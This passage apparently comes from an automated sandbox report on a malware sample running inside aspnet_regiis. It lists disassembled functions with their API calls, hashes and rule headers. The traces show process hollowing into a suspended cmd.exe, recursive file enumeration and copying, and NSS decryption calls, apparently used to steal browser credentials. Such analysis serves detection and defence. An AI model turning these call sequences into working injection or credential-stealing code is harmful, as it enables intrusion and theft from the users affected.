                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                              • FindNextFileA.KERNEL32(?,?), ref: 02A15CD8
                                                                                                                                                                              • FindClose.KERNEL32(?), ref: 02A15CEC
                                                                                                                                                                              • lstrcat.KERNEL32(?), ref: 02A15D1A
                                                                                                                                                                              • lstrcat.KERNEL32(?), ref: 02A15D2D
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A15D39
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A15D56
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcat$Filelstrcpy$Findlstrlen$Heap_memsetwsprintf$AllocateCloseCopyDeleteFirstNextProcessSystemTime
                                                                                                                                                                              • String ID: %s\%s$%s\*
                                                                                                                                                                              • API String ID: 3662577307-2848263008
                                                                                                                                                                              • Opcode ID: 6511f85b58421a943c3656ee614d738a19e36485f808754ca155d7071508dd6a
                                                                                                                                                                              • Instruction ID: 5161abf68e60f647e9b75d2a787150bdbd52d0f24e5f8e51f4b973ed3ffc61f7
                                                                                                                                                                              • Opcode Fuzzy Hash: 6511f85b58421a943c3656ee614d738a19e36485f808754ca155d7071508dd6a
                                                                                                                                                                              • Instruction Fuzzy Hash: 97712AB1D802289BDF21EB60DD89BCD7779AB49310F4009E5A609B3150EF31ABD58F59
                                                                                                                                                                              Function 02A0F54A Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 130threadinjectionmemoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 02A0F57C
                                                                                                                                                                              • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,02A365A7,00000000,00000000,00000001,00000004,00000000,00000000,?,?,00000000,00000000,00000000), ref: 02A0F5A0
                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 02A0F5B2
                                                                                                                                                                              • GetThreadContext.KERNEL32(?,00000000), ref: 02A0F5C4
                                                                                                                                                                              • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 02A0F5E2
                                                                                                                                                                              • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 02A0F5F8
                                                                                                                                                                              • ResumeThread.KERNEL32(?), ref: 02A0F608
                                                                                                                                                                              • WriteProcessMemory.KERNEL32(?,00000000,02A12D61,?,00000000), ref: 02A0F627
                                                                                                                                                                              • WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 02A0F65D
                                                                                                                                                                              • WriteProcessMemory.KERNEL32(?,?,D744E8F4,00000004,00000000), ref: 02A0F684
                                                                                                                                                                              • SetThreadContext.KERNEL32(?,00000000), ref: 02A0F696
                                                                                                                                                                              • ResumeThread.KERNEL32(?), ref: 02A0F69F
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Process$MemoryThread$Write$AllocContextResumeVirtual$CreateRead_memset
                                                                                                                                                                              • String ID: ($C:\Windows\System32\cmd.exe
                                                                                                                                                                              • API String ID: 3621800378-4087486346
                                                                                                                                                                              • Opcode ID: f55ad98590c5d54fac7980aaf1a2c769a8b667ebbe98248b9e9ca478e318f365
                                                                                                                                                                              • Instruction ID: b774ae1c8539fa1a5d2ad938788edbe89e56edc20f94b42e230093a76e6be4c9
                                                                                                                                                                              • Opcode Fuzzy Hash: f55ad98590c5d54fac7980aaf1a2c769a8b667ebbe98248b9e9ca478e318f365
                                                                                                                                                                              • Instruction Fuzzy Hash: E2413672A40208BFEB119FA8DD85FAAB7B9FF48705F144464FA01F6160DB71E9508B24
                                                                                                                                                                              Function 02A0CD37 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 298filestringCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • wsprintfA.USER32 ref: 02A0CD5C
                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 02A0CD73
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A374EC), ref: 02A0CD94
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A374F0), ref: 02A0CDAE
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                              • lstrlen.KERNEL32(02A0D3B5,02A36872,02A374F4,?,02A3686F), ref: 02A0CE41
                                                                                                                                                                              • DeleteFileA.KERNEL32(?,02A3750C,02A36873,?,02A37508,02A37504,02A37500,02A374FC), ref: 02A0D122
                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 02A0D136
                                                                                                                                                                                • Part of subcall function 02A10519: lstrcpy.KERNEL32(00000000,?), ref: 02A10538
                                                                                                                                                                                • Part of subcall function 02A07FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,02A0E756,?,?,?), ref: 02A07FC7
                                                                                                                                                                                • Part of subcall function 02A07FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,02A0E756,?,?,?), ref: 02A07FDE
                                                                                                                                                                                • Part of subcall function 02A07FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,02A0E756,?,?,?), ref: 02A07FF5
                                                                                                                                                                                • Part of subcall function 02A07FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,02A0E756,?,?,?), ref: 02A0800C
                                                                                                                                                                                • Part of subcall function 02A07FAC: CloseHandle.KERNEL32(?,?,?,?,?,02A0E756,?,?,?), ref: 02A08034
                                                                                                                                                                                • Part of subcall function 02A16E97: CreateThread.KERNEL32(00000000,00000000,02A16DC6,?,00000000,00000000), ref: 02A16F36
                                                                                                                                                                                • Part of subcall function 02A16E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 02A16F3E
                                                                                                                                                                              • FindNextFileA.KERNEL32(?,?), ref: 02A0D23C
                                                                                                                                                                              • FindClose.KERNEL32(?), ref: 02A0D250
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$lstrcpy$Find$CloseCreatelstrcatlstrlen$AllocCopyDeleteFirstHandleLocalNextObjectReadSingleSizeThreadWaitwsprintf
                                                                                                                                                                              • String ID: %s\*.*
                                                                                                                                                                              • API String ID: 3967855609-1013718255
                                                                                                                                                                              • Opcode ID: c7f5912f1fab48c90a15ca6fc45ef51cabb5b6b10350063f4fedf86987a21e00
                                                                                                                                                                              • Instruction ID: 534e1b396ec3fce247554414ec65daa98e81f35e968532ac1c84c33be4481a57
                                                                                                                                                                              • Opcode Fuzzy Hash: c7f5912f1fab48c90a15ca6fc45ef51cabb5b6b10350063f4fedf86987a21e00
                                                                                                                                                                              • Instruction Fuzzy Hash: 22D1BD32D8122D9AEF21EB24DE85BDDB7B5AF44324F4141E1A909B3151DF30AF898F90
                                                                                                                                                                              Function 6CBB0EC0 Relevance: 16.7, APIs: 11, Instructions: 213memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • PK11_PubDeriveWithKDF.NSS3 ref: 6CBB0F8D
                                                                                                                                                                              • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6CBB0FB3
                                                                                                                                                                              • PR_SetError.NSS3(FFFFE00E,00000000), ref: 6CBB1006
                                                                                                                                                                              • PK11_FreeSymKey.NSS3(?), ref: 6CBB101C
                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CBB1033
                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CBB103F
                                                                                                                                                                              • PK11_FreeSymKey.NSS3(00000000), ref: 6CBB1048
                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?), ref: 6CBB108E
                                                                                                                                                                              • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6CBB10BB
                                                                                                                                                                              • memcpy.VCRUNTIME140(?,00000006,?), ref: 6CBB10D6
                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?), ref: 6CBB112E
                                                                                                                                                                                • Part of subcall function 6CBB1570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6CBB08C4,?,?), ref: 6CBB15B8
                                                                                                                                                                                • Part of subcall function 6CBB1570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6CBB08C4,?,?), ref: 6CBB15C1
                                                                                                                                                                                • Part of subcall function 6CBB1570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBB162E
                                                                                                                                                                                • Part of subcall function 6CBB1570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBB1637
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1510409361-0
                                                                                                                                                                              • Opcode ID: 942dea145f414cbc174d8e432170ebf9a50645be9036f3942b0e572dfdd3caf9
                                                                                                                                                                              • Instruction ID: ef895d550424474d01a39df2945494c8509ce2f88c911414b0ae51c9701ccd61
                                                                                                                                                                              • Opcode Fuzzy Hash: 942dea145f414cbc174d8e432170ebf9a50645be9036f3942b0e572dfdd3caf9
                                                                                                                                                                              • Instruction Fuzzy Hash: B071D2B1E002858FDB00CFA5DD94A7AB7B8FF48318F18862CE509A7711EB31D954CB92
                                                                                                                                                                              Function 6CBD6C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CB81C6F,00000000,00000004,?,?), ref: 6CBD6C3F
                                                                                                                                                                                • Part of subcall function 6CC2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC2C2BF
                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6CB81C6F,00000000,00000004,?,?), ref: 6CBD6C60
                                                                                                                                                                              • PR_ExplodeTime.NSS3(00000000,6CB81C6F,?,?,?,?,?,00000000,00000000,00000000,?,6CB81C6F,00000000,00000004,?,?), ref: 6CBD6C94
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Alloc_ArenaErrorExplodeTimeUtilValue
                                                                                                                                                                              • String ID: gfff$gfff$gfff$gfff$gfff
                                                                                                                                                                              • API String ID: 3534712800-180463219
                                                                                                                                                                              • Opcode ID: db38d16f60db13fb57c85dfa9b0c848da65d5fe7018c9e9ea83b1ee5ef8fb035
                                                                                                                                                                              • Instruction ID: 7ddc49c3fba24916509954dc87e7fa09979ed25965a046c714a824c0add1f68b
                                                                                                                                                                              • Opcode Fuzzy Hash: db38d16f60db13fb57c85dfa9b0c848da65d5fe7018c9e9ea83b1ee5ef8fb035
                                                                                                                                                                              • Instruction Fuzzy Hash: 88513B72B015494FC71CCDADDC526DEBBDAABA4310F48C23AE442DB785D638E906C751
                                                                                                                                                                              Function 02A0A7D8 Relevance: 15.1, APIs: 10, Instructions: 94stringencryptionCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 02A0A815
                                                                                                                                                                              • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,02A0AAE7), ref: 02A0A830
                                                                                                                                                                              • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 02A0A838
                                                                                                                                                                              • PK11_GetInternalKeySlot.NSS3(?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,02A0AAE7), ref: 02A0A846
                                                                                                                                                                              • PK11_Authenticate.NSS3(00000000,00000001,00000000,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,02A0AAE7), ref: 02A0A85A
                                                                                                                                                                              • PK11SDR_Decrypt.NSS3(?,?,00000000,?,00000000,00000000,00000000,00000000,00000014,?,02A0AAE7), ref: 02A0A89A
                                                                                                                                                                              • _memmove.LIBCMT ref: 02A0A8BB
                                                                                                                                                                              • lstrcat.KERNEL32(02A36803,02A36807), ref: 02A0A8E5
                                                                                                                                                                              • PK11_FreeSlot.NSS3(00000000,?,?,?,?,?,?,?,?,?,02A0B824), ref: 02A0A8EC
                                                                                                                                                                              • lstrcat.KERNEL32(02A36803,02A3680E), ref: 02A0A8FB
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: K11_$Slotlstrcat$AuthenticateBinaryCryptDecryptFreeInternalString_memmove_memsetlstrlen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4058207798-0
                                                                                                                                                                              • Opcode ID: ef00fc75deab7aa23847ca97e98a907bad51dc4ce4b80593aad02427a2a88e89
                                                                                                                                                                              • Instruction ID: 2c0c1e55a1f4806ddd47f5a54ba5c44071add1b5209cba1de1144b368e312df5
                                                                                                                                                                              • Opcode Fuzzy Hash: ef00fc75deab7aa23847ca97e98a907bad51dc4ce4b80593aad02427a2a88e89
                                                                                                                                                                              • Instruction Fuzzy Hash: F8315CB1D0422AAFDB109F64DDC4AFAB7BCAF08740F4005B6B50EE2141EB748A958F56
                                                                                                                                                                              Function 02A0B93F Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 319fileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?,\*.*,02A36826,?,?,?), ref: 02A0B99B
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A3743C), ref: 02A0B9BC
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A37440), ref: 02A0B9D6
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                                • Part of subcall function 02A11C4A: GetSystemTime.KERNEL32(?,02A36701,?), ref: 02A11C79
                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 02A0BE0B
                                                                                                                                                                                • Part of subcall function 02A07FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,02A0E756,?,?,?), ref: 02A07FC7
                                                                                                                                                                                • Part of subcall function 02A07FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,02A0E756,?,?,?), ref: 02A07FDE
                                                                                                                                                                                • Part of subcall function 02A07FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,02A0E756,?,?,?), ref: 02A07FF5
                                                                                                                                                                                • Part of subcall function 02A07FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,02A0E756,?,?,?), ref: 02A0800C
                                                                                                                                                                                • Part of subcall function 02A07FAC: CloseHandle.KERNEL32(?,?,?,?,?,02A0E756,?,?,?), ref: 02A08034
                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02A0BE82
                                                                                                                                                                                • Part of subcall function 02A10519: lstrcpy.KERNEL32(00000000,?), ref: 02A10538
                                                                                                                                                                                • Part of subcall function 02A16E97: CreateThread.KERNEL32(00000000,00000000,02A16DC6,?,00000000,00000000), ref: 02A16F36
                                                                                                                                                                                • Part of subcall function 02A16E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 02A16F3E
                                                                                                                                                                              • FindNextFileA.KERNEL32(?,?), ref: 02A0BEF1
                                                                                                                                                                              • FindClose.KERNEL32(?), ref: 02A0BF05
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
